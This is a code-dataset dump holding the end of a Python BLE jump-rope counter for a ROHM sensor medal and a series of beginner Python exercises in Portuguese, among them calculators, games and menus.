devices = scanner.scan(interval)\n except Exception as e:\n print(\"ERROR\",e)\n if getpass.getuser() != 'root':\n print('使用方法: sudo', argv[0])\n exit()\n sleep(interval)\n continue\n\n # 受信データについてBLEデバイス毎の処理\n for dev in devices:\n #print(\"\\nDevice %s (%s), RSSI=%d dB\" % (dev.addr, dev.addrType, dev.rssi))\n isRohmMedal = False\n sensors = dict()\n for (adtype, desc, val) in dev.getScanData():\n #print(\" %s = %s\" % (desc, val))\n if desc == 'Short Local Name' and val[0:18] == 'ROHMMedal2_0040_01': #Short Local Name = ROHMMedal2_0040_01.00\n isRohmMedal = True\n if isRohmMedal and desc == 'Manufacturer':\n\n # センサ値を辞書型変数sensorsへ代入\n sensors['ID'] = hex(payval(2,2))\n sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536\n sensors['Humidity'] = 100 * payval(6,2) / 65536\n sensors['SEQ'] = payval(8)\n SEQ = sensors['SEQ']\n \"\"\"if SEQ in [255, 0, 1]:\n start_seq+= 1\n zero_time = datetime.now()\"\"\"\n\n sensors['Condition Flags'] = bin(int(val[16:18],16))\n sensors['Accelerometer X'] = payval(10,2,True) / 4096\n sensors['Accelerometer Y'] = payval(12,2,True) / 4096\n sensors['Accelerometer Z'] = payval(14,2,True) / 4096\n sensors['Accelerometer'] = (sensors['Accelerometer X'] ** 2\\\n + sensors['Accelerometer Y'] ** 2\\\n + sensors['Accelerometer Z'] ** 2) ** 0.5\n sensors['Geomagnetic X'] = payval(16,2,True) / 10\n sensors['Geomagnetic Y'] = payval(18,2,True) / 10\n sensors['Geomagnetic Z'] = payval(20,2,True) / 10\n sensors['Geomagnetic'] = (sensors['Geomagnetic X'] ** 2\\\n + sensors['Geomagnetic Y'] ** 2\\\n + sensors['Geomagnetic Z'] ** 2) ** 0.5\n sensors['Pressure'] = payval(22,3) / 2048\n sensors['Illuminance'] = payval(25,2) / 1.2\n sensors['Magnetic'] = hex(payval(27))\n magnetic = sensors['Magnetic']\n\n sensors['Steps'] = payval(28,2)\n step_cnt = sensors['Steps']\n if SEQ in [255,0,1] and step_cnt == 0:\n start_seq+= 1\n start_time= datetime.now()\n start_text= str(start_seq)+\"回目を\"+start_time.strftime('%H:%M:%S')+\"にスタート。前回は\"+last_time.strftime('%H:%M:%S')+\"に\"+str(last_cnt)\n if last_cnt!=0:\n line_message(start_text)\n sheet.append([last_time.strftime('%Y/%m/%d'), last_time.strftime('%H:%M:%S'), \n last_cnt, last_dur, last_cal, last_mv])\n else:\n last_time= start_time\n last_cnt = step_cnt\n\n cur_time= datetime.now()\n time_text= cur_time.strftime('%Y/%m/%d(%a) %H:%M:%S')\n print(time_text)\n c.itemconfigure(c1, text=time_text)\n\n if start_seq >= 1:\n dur_time= cur_time - start_time\n cur_cnt = round(step_cnt*1.5)\n cur_cal = round(cur_cnt/4)\n cur_mv = round(cur_cnt/1000,1)\n\n #t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute, now.second)\n dur_seconds = dur_time.seconds \n if dur_seconds > 3600:\n dur_text = str(round(dur_seconds / 3600,1)) + \"時間\"\n elif dur_seconds > 60:\n dur_text = str(round(dur_seconds / 60)) + \"分\"\n else:\n dur_text = str(dur_seconds) + \"秒\"\n jump_text= dur_text+\"!\"+str(cur_cnt)+\"回!\"+str(cur_cal)+\"カロリ-!\"\n print(jump_text) #'Count:',cur_cnt,', Duration:',duration,'-',round(duration.seconds))\n\n c.itemconfigure(ch, text=\"{}回目のチャレンジ!目指せ1日1000回!\".format(start_seq))\n c.itemconfigure(c2, text=jump_text)\n if cur_cnt > 10:\n comp_text = str(cur_cnt)+\"回跳んだよ!\"\n if cur_cnt%100 == 0:\n line_message(comp_text)\n elif cur_cnt%10 == 0:\n totals = get_spreadsheet('Total')\n total_jump= totals[2]\n total_dur = totals[3]\n total_hour= round(int(total_dur)/3600,1)\n total_cal = totals[4]\n total_food= round(float(total_cal)/200)\n total_mv = totals[5]\n stations = json_load['stations']\n for v in stations:\n dist = v['dist']\n acc_dist = v['acc_dist']\n prev_dist= acc_dist-dist\n if prev_dist < int(total_mv) < acc_dist:\n cur_num = v['num']\n cur_name= v['name']\n cur_dist= dist\n cur_acc_dist= acc_dist\n #next_name = v[cur_num+1]['name']\n mv_text = str(cur_mv)+\"Km進んだよ(\"+cur_name+\"宿まで後\"+str(round(cur_acc_dist-int(total_mv)))+\"Km)\"\n c.itemconfigure(c3, text=mv_text)\n total_text = \"トータル\"+str(total_hour)+\"時間\"+total_jump+\"回跳んで\"+total_cal+\"カロリ-消費!\"\n goal_text = \"おにぎり\"+str(total_food)+\"個分、江戸から\"+total_mv+\"Km!(残り\"+str(round(550-int(total_mv)))+\"Km)\"\n c.itemconfigure(c4, text=total_text)\n c.itemconfigure(c5, text=goal_text)\n\n last_dur = dur_seconds\n last_cal = cur_cal\n last_mv = cur_mv\n\n sensors['Battery Level'] = payval(30)\n sensors['RSSI'] = dev.rssi\n\n # 画面へ表示\n #print(' ID =',sensors['ID'])\n print(' SEQ =',sensors['SEQ'])\n print(' Steps =',sensors['Steps'],'Cnt')\n\n '''\n for key, value in sorted(sensors.items(), key=lambda x:x[0]):\n print(' ',key,'=',value)\n '''\n c.update()\n\n# メインループ\nroot.mainloop()\n\n"
}
] | 8 |
TassioSales/PythonMundo1 | https://github.com/TassioSales/PythonMundo1 | 9660ab8e92070e5b6350400b1ebc51c83c4cae2c | c61eeb28d70a72b9faa47513606edcd718e7161f | bd0abe129e03c941f9ff658e1523d58155017c1d | refs/heads/main | 2023-01-19T18:49:44.807045 | 2021-05-25T04:23:31 | 2021-05-25T04:23:31 | 314,386,026 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5780932903289795,
"alphanum_fraction": 0.5902636647224426,
"avg_line_length": 22.4761905670166,
"blob_id": "7e5913b8c684f944efce2e31dd23503f178938ba",
"content_id": "4a7e9c46ea3871970da6e1d9eee6fc30ea14f29e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 21,
"path": "/EX 081_Extraindo_dados_de_uma_Lista.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "lista = []\ncont = 0\n\nwhile True:\n num = int(input('Digite um valor: '))\n lista.append(num)\n cont += 1\n opc = str(input('Quer continuar [S/N]? ')).strip().upper()[0]\n if opc == 'S':\n continue\n elif opc == 'N':\n break\n else:\n print('Opção invalida')\nprint(f'Voce digitou {cont} numeros')\nlista.sort(reverse=True)\nprint(f'A Lista ordenada e {lista}')\nif 5 in lista:\n print(\"O numero 5 foi encontrado\")\nelse:\n print('O Numero 5 nao foi encontrado')\n"
},
{
"alpha_fraction": 0.5942028760910034,
"alphanum_fraction": 0.6038647294044495,
"avg_line_length": 28.571428298950195,
"blob_id": "28d7619832b40b52872cbf40048cdfacb320f283",
"content_id": "daa9f97dbf4f9240e819d12ecde391c549dd4df4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 416,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 14,
"path": "/EX 096_Função que calcula área.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "#def area():\n #altura = float(input(\"Digite a altura: \"))\n #largura = float(input(\"Digite a largura: \"))\n #area = altura * largura\n #print(f'A area de uma terreno {altura} x {largura} e de {area}m²')\n#area()\ndef area2(a, l):\n area = a * l\n print(f'A area de um terreno {a} x {l} e de {area}m²')\n\naltura = float(input('ALTURA(m): '))\nlargura = float(input('LARGURA(m) '))\n\narea2(altura, largura)\n"
},
{
"alpha_fraction": 0.48982784152030945,
"alphanum_fraction": 0.5148670077323914,
"avg_line_length": 21.785715103149414,
"blob_id": "f0e49299769f1f5e825c41ab7b0713d86e5e005c",
"content_id": "52f0405fd2953d1669c1bff400cb14c7e877f028",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 639,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 28,
"path": "/EX 088_Palpites para a Mega Sena.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nfrom time import sleep\n\nlista = []\njogos = []\nprint('-_-' * 8)\nprint('GERADOR JOGOS DA MEGA')\nprint('-_-' * 8)\nqtd = int(input('Quantos jogos voce quer ?'))\ntot = 0\nwhile tot <= qtd:\n cont = 0\n while True:\n num = randint(1, 60)\n if num not in lista:\n lista.append(num)\n cont += 1\n if cont >= 6:\n break\n lista.sort()\n jogos.append(lista[:])\n lista.clear()\n tot += 1\nprint('-x-' * 3, f'SORTEANDO {qtd} JOGOS', '-x-' * 3)\nfor i, l in enumerate(jogos):\n print(f'jogo {i + 1}: {l}')\n sleep(2)\nprint('-x-' * 3, '< BOA SORTE >', '-x-' * 3)\n\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6861538290977478,
"avg_line_length": 31.5,
"blob_id": "4df18107f6f0682a16a0a6d1310dbe98ccdedf6f",
"content_id": "a3377e98809e82831b5a299557fd1447e2de2fd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 10,
"path": "/EX 011_Pintando_parede.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def tinta():\n print(f'Voce vai gasta um total de {area / 2} litros de tinta para pintar a parede: ')\n\n\nlargura = float(input('Digite a Largura : '))\naltura = float(input(\"Digite a Altura :\"))\narea = largura * altura\nprint(f\"A parede de largura {largura} e altura {altura} da uma parede com uma area de {area}m²\")\n\ntinta()\n"
},
{
"alpha_fraction": 0.5541298985481262,
"alphanum_fraction": 0.5741780400276184,
"avg_line_length": 19.09677505493164,
"blob_id": "2c4b9b5bbefa1237e18d80d60fd91bafcbc7077e",
"content_id": "746969cbc730fc39d0713d066e8452dca9bd38b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 62,
"path": "/EX 045_Jokenpo.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nfrom time import sleep\n\ndef Pedra(jogador):\n if jogador == 0:\n print(\"EMPATE\")\n elif jogador == 1:\n print(\"JOGADOR VENCE\") \n elif jogador == 2:\n print(\"COMPUTADOR VENCE\") \n else:\n print(\"JOGADA INVALIDA\")\n\ndef Papel(jogador):\n if jogador == 0:\n print(\"COMPUTADOR VENCE\") \n elif jogador == 1:\n print(\"EMPATE\")\n elif jogador == 2:\n print(\"JOGADOR VENCE\") \n else:\n print(\"JOGADA INVALIDA\")\n\ndef Tesoura(jogador):\n if jogador == 0:\n print(\"JOGADOR VENCE\") \n elif jogador == 1:\n print(\"COMPUTADOR VENCE\") \n elif jogador == 2:\n print(\"EMPATE\")\n else:\n print(\"JOGADA INVALIDA\")\n\nitens = ('Pedra', 'Papel', 'Tesoura')\ncomputador = randint(0, 2)\n\nprint(\"[ 0 ] PEDRA\\n\"\n \"[ 1 ] PAPEL\\n\"\n \"[ 2 ] TESOURA\\n\")\n\njogador = int(input(\"Qual sua jogada ?\"))\nsleep(1)\nprint(\"JO\")\nsleep(1)\nprint(\"KEN\")\nsleep(1)\nprint(\"PO\")\nsleep(1)\n\nprint('-=-' * 12)\nprint(f\"O computador escolheu {itens[computador]}\")\nprint(f\"O jogador escolheu {itens[jogador]}\")\nprint('-=-' * 12)\n\nif computador == 0:\n Pedra(jogador)\n\nelif computador == 1:\n Papel(jogador)\n\nelif computador == 2:\n Tesoura(jogador)\n\n"
},
{
"alpha_fraction": 0.6470588445663452,
"alphanum_fraction": 0.6875,
"avg_line_length": 37.71428680419922,
"blob_id": "56c620353629307973c10643f57e53336a742d18",
"content_id": "958140e3600a7e5216fdb2e9e1ae981060c8df4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 275,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 7,
"path": "/EX 031_Custo_da_viagem .py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "distancia = float(input(\"Digite a distancia da viagem : \"))\nprint(f\"Voce esta prestes a começar uma viagem de {distancia}km\")\nif distancia <= 200.0:\n preco = distancia * 0.50\nelse:\n preco = distancia * 0.45\nprint(f'E o preço da sua passagem será de R${preco:.2f}') "
},
{
"alpha_fraction": 0.6136363744735718,
"alphanum_fraction": 0.6403743028640747,
"avg_line_length": 30.08333396911621,
"blob_id": "21739eb1381ac628e520c38fd0957c2cf66a8209",
"content_id": "391822f8841fc26e1cd2de8be9c09a042b3fe3bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 749,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 24,
"path": "/EX 056_Analisador_completo.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "somaidade = 0\nmediaidade = 0\nmaioridadedehomem = 0\nnomedovelho = 0 \ntotmulher20 = 0\nfor c in range (0,4):\n nome = str(input(\"Nome: \")).strip()\n idade= int(input('Digite sua idade: '))\n sexo = str(input(\"Sexo[M/F]: \")).strip()\n somaidade += idade\n if p == 1 and sexo in \"Mm\":\n maioridadedehomem = idade \n nomevelho = nome\n if sexo in 'Mm' and idade > maioridadedehomem:\n maioridadedehomem = idade \n nomevelho = nome\n if sexo in \"Ff\" and idade < 20:\n totmulher20 += 1\n\n\nmediaidade = somaidade / 4\nprint(f'A media de idade e {mediaidade} anos ')\nprint(f'O homem mais velho tem {maioridadedehomem} anos e se chama {nomevelho}')\nprint(f'Ao todo são {totmulher20} mulheres com menos de 20 anos')\n\n\n"
},
{
"alpha_fraction": 0.6589403748512268,
"alphanum_fraction": 0.6754966974258423,
"avg_line_length": 22.230770111083984,
"blob_id": "8b0e808b642c8310d0eaaa4c80d708ec316da74c",
"content_id": "a21ede1f7e92631b925851c68f29dbc40b2b7ef5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 13,
"path": "/EX 074 _Maior_e_menor_valores _em _Tupla.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\n\nvalores = [randint(1, 60) for i in range(0, 6)]\n\nprint(f'Os valores sorteado foram', end=\" \")\n\nvalores = sorted(valores)\n\nfor n in valores:\n print(f'{n}', end=\" \")\n\nprint(f\"\\nO Maior valor sorteado foi {max(valores)}\")\nprint(f'O menor valor sorteado foi {min(valores)}')\n"
},
{
"alpha_fraction": 0.530324399471283,
"alphanum_fraction": 0.5615891218185425,
"avg_line_length": 28.54166603088379,
"blob_id": "89120478202da73bbb96831a2b9d0e566f1d7f03",
"content_id": "607ebb6186d2c055323f76372e6c0a267b1676fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4268,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 144,
"path": "/EX 012_Calculando_desconto.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "roupa = []\nvalor = []\nvalorTotal = sum(valor)\n\n\ndef adicionar():\n roupa.append(input('Digite qual tipo de roupa : '))\n valor.append(float(input(\"Digite o valor : \")))\n\n\ndef excluir():\n global c\n for c in range(0, len(roupa)):\n print(f'COD : \\033[31m{c}\\033[m TIPO \\033[36m{roupa[c]}\\033[m VALOR R$ \\033[35m{valor[c]}\\033[m\\n')\n opc = int(input(\"Qual vc deseja expluir ?\"))\n while c != opc:\n print(\"opcão invalida\")\n opc = int(input(\"Qual vc deseja expluir ?\"))\n print(f\"Voce escolheu a {opc} que e uma {roupa[c]}\")\n decisao = str(input('Tem ceteza disso S/N : ')).upper().strip()\n if decisao == \"S\":\n del (roupa[opc])\n del (valor[opc])\n elif decisao == \"N\":\n print(\"Ok Voltando para o menu\")\n else:\n print(\"opção invalida\")\n print(\"Retornando ao MENU\")\n\n\ndef modificar():\n global c\n for c in range(0, len(roupa)):\n print(f'COD : \\033[31m{c}\\033[m TIPO \\033[36m{roupa[c]}\\033[m VALOR R$ \\033[35m{valor[c]}\\033[m\\n')\n mod = int(input('Qual opçao vc deseja modificar:'))\n print(c)\n print(mod)\n while mod != c:\n print(\"opcão invalida\")\n mod = int(input(\"Qual vc deseja modificar ?\"))\n print(f\"Voce escolheu a {mod} que e uma {roupa[c]}\")\n decisao = str(input('Tem ceteza disso S/N : ')).upper().strip()\n if decisao == \"S\":\n roupa[mod] = input(\"Digite qual tipo de roupa: \")\n valor[mod] = float(input(\"Digite o valor para modigficado :\"))\n elif decisao == \"N\":\n print(\"Ok Voltando para o menu\")\n else:\n print(\"opção invalida\")\n print(\"Retornando ao MENU\")\n\n\ndef desconto():\n for c in range(0, len(roupa)):\n print(f'COD : \\033[31m{c}\\033[m TIPO \\033[36m{roupa[c]}\\033[m VALOR R$ \\033[35m{valor[c]}\\033[m\\n')\n print(f'O valor total dos produtos deu: R${sum(valor)}')\n desc = float(input('Quantos % voce quer da de desconto'))\n totalComDesconto = sum(valor) - (sum(valor) * desc / 100)\n print(f'O total a ser pago e R$ {totalComDesconto}')\n\n\ndef mostra():\n for c in range(0, len(roupa)):\n print(f'COD : \\033[31m{c}\\033[m TIPO \\033[36m{roupa[c]}\\033[m VALOR R$ \\033[35m{valor[c]}\\033[m\\n')\n\n\ndef menuformaspagemento():\n print('FORMAS DE PAGAMENTO')\n print('( 1 ) Dinheiro:\\n'\n '( 2 ) Cartao Debito:\\n'\n '( 3 ) Credito:\\n'\n '( 4 ) Cheque: \\n'\n '( 5 ) Tranferecia Bancaria: \\n'\n '( 6 ) Outro tipo de desconto\\n'\n '( 8 ) Cancelar compra\\n')\n\n\ndef menuprincipal():\n print('MENU\\n'\n '(1)ADICIONAR\\n'\n '(2)EXCLUIR\\n'\n '(3)MODIFICAR\\n'\n '(4)DESCONTO\\n'\n '(5)MOSTRA ITENS\\n'\n '(6)FINALIZAR COMPRA\\n')\n\n\ndef menubancos():\n print('INFORME AO CLIENTE OS BANCOS')\n print('( 1 ) BANCO BRASIL\\n'\n '( 2 ) CAIXA ECONOMIDA\\n'\n '( 3 ) ITAU\\n')\n\n\ndef finalizarcompra():\n menuformaspagemento()\n opc = int(input('Digite a opção desejada: '))\n\n def dinheiro():\n valortotal = sum(valor)\n print(valortotal)\n tot_desc = 15\n print(f'Sua compra deu um valor de R${valortotal}')\n valortotal = valortotal - (valortotal * tot_desc / 100)\n print(f'Com desconto de preço avista de 15% a compra ficara por {valortotal}')\n valorPago = float(input('Qual valor recebido para pagamento '))\n troco = valorPago - valortotal\n if valorPago > valortotal:\n print(f'Devolva para o cliente de troco o valor de R$ {troco}')\n print(\"Obrigado pela preferecia volte sempre:\")\n valor.clear()\n roupa.clear()\n elif valorPago == valorTotal:\n print(\"Obrigado pela preferecia volte sempre:\")\n valor.clear()\n roupa.clear()\n while valorPago < valortotal:\n continue\n\n\n\n if opc == 1:\n dinheiro()\n\n\nwhile True:\n menuprincipal()\n opcao = int(input('Qual opção desejada: '))\n\n if opcao == 1:\n adicionar()\n elif opcao == 2:\n excluir()\n elif opcao == 3:\n modificar()\n elif opcao == 4:\n desconto()\n elif opcao == 5:\n mostra()\n elif opcao == 6:\n finalizarcompra()\n else:\n print(\"OPÇÃO INVALIDA\")\n continue\n"
},
{
"alpha_fraction": 0.5793991684913635,
"alphanum_fraction": 0.6137338876724243,
"avg_line_length": 25,
"blob_id": "b14245501282c52e7d7c0a1697bedff019a01047",
"content_id": "86306ef33e753ffa279240fe8da8a74b5ce7de11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 9,
"path": "/EX 066 _Vários_números_com_flag.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "soma=cont= 0\nwhile True:\n num =int(input(\"digite um numero (999 para parar): \"))\n if num == 999:\n break\n cont += 1\n soma += num\nprint(f\"Voce digitou {cont} numeros\")\nprint(f'A soma dos valores digitados e {soma}')"
},
{
"alpha_fraction": 0.5135565996170044,
"alphanum_fraction": 0.5534290075302124,
"avg_line_length": 24.100000381469727,
"blob_id": "247f71e20d97a35ada35423c35233d644aec52e3",
"content_id": "e2f63b6c20696d3738f2ac52b7765dfc2806d3a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1262,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 50,
"path": "/EX 059_Criando_um_Menu_de_Opções.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def somar (n1, n2):\n soma = n1 + n2\n print(f\"A soma dos numeros {n1} e {n2} = {soma}\")\n\ndef subtracao(n1, n2):\n subtracao = n1 - n2\n print(f\"A subtracao dos numeros {n1} e {n2} = {subtracao}\")\n\ndef multiplicacao(n1, n2):\n multiplicacao = n1 * n2 \n print(f\"A multiplicação dos numeros {n1} e {n2} = {multiplicacao}\")\n\n \ndef maior(n1, n2):\n maior = n1\n if n2 > n1:\n maior = n2\n print(f\"O maior numero digitado foi {maior}\")\nnum1 = float(input(\"Digite o primeiro valor: \"))\nnum2 = float(input(\"Digite o segundo valor : \"))\nwhile True:\n print(\"\"\"\n [ 1 ] somar\n [ 2 ] subtrair\n [ 3 ] multiplicação\n [ 4 ] Novos numeros\n [ 5 ] Maior\n [ 6 ] Sair\n\"\"\")\n opt = int(input(\"Digite sua opção: \"))\n if opt == 1:\n somar(num1, num2)\n elif opt == 2:\n subtracao(num1, num2)\n elif opt == 3:\n multiplicacao(num1, num2) \n elif opt == 4:\n num1 = float(input(\"Digite o primeiro numero: \"))\n num2 = float(input(\"Digite o segundo numero: \"))\n print(f\"Os novos numeros digitatos foram {num1} e {num2}\")\n continue\n elif opt == 5:\n maior(num1, num2)\n elif opt == 6:\n break\n else:\n print(\"Opção invalida\")\n continue\n\n()"
},
{
"alpha_fraction": 0.6472868323326111,
"alphanum_fraction": 0.6705426573753357,
"avg_line_length": 27.77777862548828,
"blob_id": "67fbc0b0596863af58cadfb3f0e270179dd8542c",
"content_id": "ceae953b0e7a5e5a7eb94c1ed7d6a2ffb7c87642",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 259,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/EX 038_Comparando_Numeros.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num1 = float(input(\"Digite o primeiro numero: \"))\nnum2 = float(input(\"Digite o segundo numero: \"))\n\nif num1 > num2:\n print(\"O PRIMEIRO numero e maior\")\nelif num2 > num1:\n print(\"O SEGUNDO numero e maior\")\nelse:\n print(\"OS dois numeros são IGUAIS\")"
},
{
"alpha_fraction": 0.6176470518112183,
"alphanum_fraction": 0.633217990398407,
"avg_line_length": 25.31818199157715,
"blob_id": "35961ed32114600133e2d4f9e6bd47e5e6dcf914",
"content_id": "13885e5bf52fb626887c0edc3d0a6d57411e3d99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 22,
"path": "/EX 037_Conversor_de_Bases_Numéricas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def binario(x):\n print(f\"O numero {x} convertido para binario e {bin(x)[2:]}\")\n\ndef octal(x):\n print(f'O numero {x} convertido para OCTAL e {oct(x)[2:]}')\n\ndef hexadecimal(x):\n print(f'O numero {x} convertido para HEXADECIMAL e {hex(x)[2:]}')\n\nnum = int(input('Digite um numero: '))\nprint('[ 1 ] converter para BINARIO')\nprint('[ 2 ] converter para OCTAL')\nprint('[ 3 ] converter para HEXADECIMAL')\nopc = int(input('Digite sua opção: '))\nif opc == 1:\n binario(num)\nelif opc == 2:\n octal(num)\nelif opc == 3:\n hexadecimal(num)\nelse:\n print(\"OPÇÃO INVALIDA\")"
},
{
"alpha_fraction": 0.6984127163887024,
"alphanum_fraction": 0.6984127163887024,
"avg_line_length": 41.33333206176758,
"blob_id": "e53e18b84228848bd9916acf47d6fdbc81ae6b67",
"content_id": "d667b272d2b80f2c1e1417968a851d15c5121d12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 3,
"path": "/EX 014_Conversor_de_Temperaturas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "import math\nnum = float(input('digite um numero: '))\nprint(f'o numero real e {num} e sua porcao inteira e {math.trunc(num)} ')"
},
{
"alpha_fraction": 0.5479274392127991,
"alphanum_fraction": 0.5854922533035278,
"avg_line_length": 27.592592239379883,
"blob_id": "68d42cd69b943472fef4ef9fdf3d3d26ce4e0a9f",
"content_id": "a49a6383523e2011d5e20946d390eae036482206",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 784,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 27,
"path": "/exercicio_guanabara_2.0/EX 003.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num1 = float(input('Digite uma numero: '))\nnum2 = float(input('Digite outro numero: '))\n\n\ndef soma(x, y): return x + y\ndef subtracao(x, y): return x - y\ndef divisao(x, y): return x / y\ndef multiplicacao(x, y): return x * y\n\n\nprint(f'''{'MENU':^20}\n [ 1 ] SOMA\n [ 2 ] SUBTRAÇÃO \n [ 3 ] DIVISAO\n [ 4 ] MULTIPLICAÇÃO\n [ 5 ] SAIR ''')\nopc = int(input('digite a opção desejada: '))\nif opc == 1:\n print(f'A soma de {num1} e {num2} = {soma(num1, num2)}')\nelif opc == 2:\n print(f'A subtração de {num1} e {num2} = {subtracao(num1, num2)}')\nelif opc == 3:\n print(f'A divisao de {num1} e {num2} = {divisao(num1, num2)}')\nelif opc == 4:\n print(f'A multiplicação de {num1} e {num2} = {multiplicacao(num1, num2)}')\nelse:\n print('opção invalida')\n"
},
{
"alpha_fraction": 0.5841924548149109,
"alphanum_fraction": 0.6254295706748962,
"avg_line_length": 35.25,
"blob_id": "7487d9503a4cfb57e5fd9cb0866bf65bba6140f1",
"content_id": "3960ee2315dfc8c586b9bc0060ad7ae6455f3958",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 292,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 8,
"path": "/EX 032_Ano_Bissexto.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import date \nano = int(input(\"Digite que ano deseja analisar: ou digite 0 para o ano atual \"))\nif ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:\n print(f'O ano {ano} e BISSEXTO')\nelif ano == 0:\n ano = date.today().year\nelse:\n print(f'O ano {ano} NÃO e BISSEXTO')\n\n"
},
{
"alpha_fraction": 0.6340042352676392,
"alphanum_fraction": 0.6583686470985413,
"avg_line_length": 40.0217399597168,
"blob_id": "9b9d3c66ef9e367c2c8aa964921724bfde1ac41a",
"content_id": "b6f91f663149440483afab2155cf65c5321a1a82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1898,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 46,
"path": "/EX 044_Gerenciador_de_Pagamentos.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def avista(valor):\n valorAvista = valor - (valor * 10 / 100)\n print(\"Sua compra com pagamento a avista tem um desconto de 10% \")\n print(f\"Sua compra que estava no valor de {valor} vai sair por {valorAvista}\")\ndef Debito(valor):\n debitoAvista = valor - (valor * 5 / 100)\n print(\"Sua compra que com pagamento no Cartão de debito tem um desconto de 5%\")\n print(f\"Sua compra que estava no valor de {valor} vai sair por {debitoAvista}\")\ndef creditoAte2x(valor):\n vezes = int(input(\"Digite em quantas vezes ira parcelar: 1 ou 2 vezes: \"))\n if vezes == 1 or vezes == 2:\n print(\"Não temos desconto para compras parceladas em ate 2 vezes\")\n credito2x = valor / vezes\n print(f\"Sua compra tem uma valor inicial de {valor}\")\n print(f\"Esse valor vai ficar parcelado em {vezes} x {credito2x}\")\n else:\n print(\"Lembramos que para esse opção e permitido apenas dividir em ate 2 vezes\")\n\ndef creditoMaior2x(valor):\n vezes = int(input(\"Digite em quantas vezes ira parcelar: \"))\n valorFinal = valor + (valor * 20 / 100)\n print(\"Para compras dividas acima de 2x temos um juros de 20%\")\n print(f\"Então sua compra que era de {valor} com o juros saira por {valorFinal}\")\n valorParcela = valorFinal / vezes\n print(f\"O valor {valorFinal} divido em {vezes} vezes\") \n print(f\"Ficara em {vezes} x {valorParcela}\")\n\n \nvalorCompra = float(input(\"Digite o valor da sua compra: \"))\nprint(\"-=-\" * 20)\nprint(\"FORMAS DE PAGAMENTO\")\nprint(\"-=-\" * 20)\nprint(\"[ 1 ] a vista dinheiro/cheque\\n\"\n \"[ 2 ] a vista catão debito\\n\"\n \"[ 3 ] 2 x cartão de credito\\n\"\n \"[ 4 ] 3 x ou mais no cartão de credito\\n\")\nopc = int(input(\"Digite a opção de desejada: \"))\n\nif opc == 1:\n avista(valorCompra)\nelif opc == 2:\n Debito(valorCompra)\nelif opc == 3:\n creditoAte2x(valorCompra)\nelif opc == 4:\n creditoMaior2x(valorCompra) \n"
},
{
